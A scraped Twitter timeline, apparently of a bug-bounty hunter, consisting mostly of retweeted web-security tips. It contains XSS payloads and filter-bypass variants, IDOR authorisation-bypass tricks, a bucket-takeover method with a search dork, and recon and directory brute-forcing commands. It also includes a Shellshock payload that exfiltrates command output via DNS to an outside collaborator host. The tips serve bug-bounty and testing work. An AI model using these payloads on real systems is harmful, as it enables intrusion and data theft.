Tweets


  1. Pinned Tweet
    Jan 10

    Purchased a ticket for with my first bounty. Thanks to

  2. Retweeted
    Jan 30

    I published another blog today. This is a story about an interesting SQL Injection I found. “A Not-So-Blind RCE with SQL Injection” by Prashant Kumar

  3. Retweeted
    Jan 10

    Still after all these years my favourite XSS payload is: <iframe/src=j%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0t:prompt `1`>

  4. Retweeted
    Jan 14

    bypass alert filter: (alert)(1) a=alert,a(2) [3].find(alert) al\u0065rt(4) alert`5` [6].map(alert) [7].every(alert) [8].filter(alert) [9].findIndex(alert) [10].forEach(alert) self['alert'](11) parent['alert'](12) window['alert'](13)

  5. Retweeted
    Jan 27

    When you're brute forcing for endpoints, don't forget to add extensions. You can also use this method to discover backup files. Here's a command I use frequently: dirsearch -e php,asp,aspx,jsp,py,txt,conf,config,bak,backup,swp,old,db,sql -u <target>

  6. Retweeted
    Jan 26

    GET /example?param=test .. nothing interesting happened, not vuln to XSS. (<> " was filtered) but if I change it to POST it's reflected as value=\"test\" POST /example#xss param=test+onfocus='alert(0)'id='xss' ..and I can haz XSS bypassing their 'filter'

  7. Retweeted
    Jan 27

    -API TIP:26/31- Looking for BOLA (IDOR) in APIs? got 401/403 errors? AuthZ bypass tricks: * Wrap ID with an array {"id":111} --> {"id":[111]} * JSON wrap {"id":111} --> {"id":{"id":111}} * Send ID twice URL?id=<LEGIT>&id=<VICTIM> * Send wildcard {"user_id":"*"}

  8. Retweeted
    Jan 25
  9. Retweeted
    Jan 25

    Digital Ocean Bucket Takeover:- format: bucketname[.]region[.]digitaloceanspaces[.]com In Console:- Create Space, type the bucket name, make it public :) How to find? site:github[.]com intext:digitaloceanspaces[.]com

  10. Jan 24

    Thank you for the stickers 😄

  11. Jan 22

    I just completed 's Essential Badge!!!

  12. Retweeted
    Jan 19

    1 liner to get a list of all *.mil sites for DeptOfDefense's program on crtsh %.mil | rev | cut -d "." -f 1,2 | rev | sort -u | tee -a ~/recondata/milsite.txt | grep -v "\@"

  13. Retweeted
    Jan 13
  14. Retweeted
    Jan 13
  15. Retweeted
    Jan 10

    I just published "Hunting Good Bugs with only <HTML>" I hope you enjoy this post!

  16. Jan 10

    I just completed 's Unix Badge!!!

  17. Retweeted
    Jan 9

    Blind SSRF with Shellshock exploitation payload: () { :; }; /usr/bin/nslookup $(whoami).tgdgspp0ee8bwyqtkrwumkotrkxalz.burpcollaborator.net ✌️

  18. Retweeted
    Jan 9
  19. Retweeted
    Jan 7

    I never share such bugs but this is however unique and had a good impact please do share.

  20. Retweeted
    Jan 6